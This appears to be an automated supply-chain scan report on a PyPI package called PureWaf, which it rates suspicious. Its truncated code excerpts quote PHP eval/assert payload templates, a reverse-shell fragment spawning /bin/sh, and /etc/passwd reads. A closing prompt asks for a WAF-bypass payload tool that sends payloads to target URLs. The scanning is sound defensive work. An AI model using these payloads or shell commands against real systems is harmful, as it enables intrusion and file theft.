AI Analysis
Final verdict: SUSPICIOUS
The package exhibits high obfuscation and credential risks, suggesting potential malicious intent. While the metadata risk is lower, the combination of these factors raises concerns about a possible supply-chain attack.
- High obfuscation risk due to PHP code execution patterns
- Potential credential harvesting through references to '/etc/passwd'
Per-check LLM notes
- Obfuscation: The presence of PHP code execution patterns and obfuscated code suggests potential for malicious activity.
- Credentials: References to '/etc/passwd' and attempts to access system files indicate a risk of credential harvesting.
- Metadata: The maintainer has only one package and lacks PyPI classifiers, indicating potential low effort or inexperience, which may raise suspicion.
Heuristic Checks
Outbound Network Calls
score 3.0
Found 2 network call pattern(s)
i in range(1,20): res = requests.post(url=url, params=params, files=file) if "flag" in res.te+ "-" * 1000000 + '"}' res = requests.post(url=url, data={"letter": payload}) print(res.text) """
Code Obfuscation
score 10.0
Found 6 obfuscation pattern(s)
?", "system(", "echo ", "$", "eval(", "assert(")): return "php_code" re"require_once(", "eval(", "assert(", "system(", "passthrf^%a0%b8%ba%ab);$_();", "eval(pos(get_defined_vars()));", "print_r(getallheaders());"LE_HIJACK_TEMPLATES = [ "eval(array_pop(next(get_defined_vars())));", ] NON_ALNUM_ASSEt_r(getallheaders());", "eval(next(getallheaders()));", } # hints that trigger variable hijacking VARIABLE_HIJACKIP_TRIGGER_PAYLOADS = { "eval(array_pop(next(get_defined_vars())));", } ASSERT_POST_TI
Shell / Subprocess Execution
score 10.0
Found 5 shell execution pattern(s)
try: proc = subprocess.run( [php_bin], input=script.enctry: proc = subprocess.run( [php_bin, str(script_path)],name): proc = subprocess.run( [php_bin, "-l", os.path.join(FIXTURE_DI(script): proc = subprocess.run( [php_bin], input=script.e(),1); os.dup2(s.fileno(),2); pty.spawn(\"/bin/sh\")'", ] PHPINFO_TEMPLATES = [ "php -r 'ph
Credential Harvesting
score 10.0
Found 5 credential access pattern(s)
"{path}", "/etc/passwd", ], } # triggered according to the sanitizer. AUTO_ESCAPESHELLARG_GADEX, flagfile="/etc/passwd", log_level="INFO", ),al(result.shortest_flag, "rev /etc/passwd") self.assertNotIn("\\", result.shortest_root)e", flagfile="/etc/passwd", read_env=True, reflect_shassertEqual(config.flagfile, "/etc/passwd") self.assertTrue(config.read_env) self.ass
Typosquatting
No typosquatting candidates detected
Registered Email Domain
No author email provided
Suspicious Page Links
All external links appear legitimate
Git Repository History
Repository PureStream108/PureWaf appears legitimate
Maintainer History
score 4.0
2 maintainer concern(s) found
- Author "Pure Stream" appears to have only 1 package on PyPI (new or inactive account)
- Package has no PyPI classifiers (low effort / metadata quality)
Known CVE Vulnerabilities
No known vulnerabilities found in OSV database.
AI App Starter Prompt
Use this prompt to build a project with PureWaf
Your task is to develop a fully-functional mini-application called 'WafBuster' that leverages the 'PureWaf' package to generate payloads designed to bypass Web Application Firewalls (WAFs). This tool will be useful for security professionals who need to test the effectiveness of their WAF configurations against potential evasion techniques. Here's a detailed breakdown of what your application should include and how it should work:

1. **User Interface**: Design a simple yet intuitive command-line interface (CLI) where users can input parameters such as target URL, HTTP method, and type of payload they wish to generate.
2. **Payload Generation**: Utilize the core functionalities of the 'PureWaf' package to dynamically generate payloads based on user inputs. Ensure that the application supports at least three types of common evasion techniques: encoding, obfuscation, and polymorphism.
3. **Testing Environment**: Integrate a basic testing mechanism within the application that allows users to immediately send the generated payloads to the specified target URL using the chosen HTTP method (e.g., GET, POST).
4. **Response Analysis**: After sending the payload, the application should analyze the response from the server to determine if the WAF was successfully bypassed. Provide feedback to the user indicating whether the payload was effective or not.
5. **Logging**: Implement a logging feature that records each test attempt, including the payload used, the response received, and the outcome of the test.
6. **Security Considerations**: Ensure that the application includes a disclaimer about ethical hacking guidelines and warns users against using the tool for malicious purposes.
7. **Documentation**: Create comprehensive documentation explaining how to install and use the application, along with examples of typical use cases.

Remember to leverage the 'PureWaf' package's capabilities to make your application robust and versatile.
Your goal is to create a powerful yet easy-to-use tool that helps security experts enhance the security of their web applications.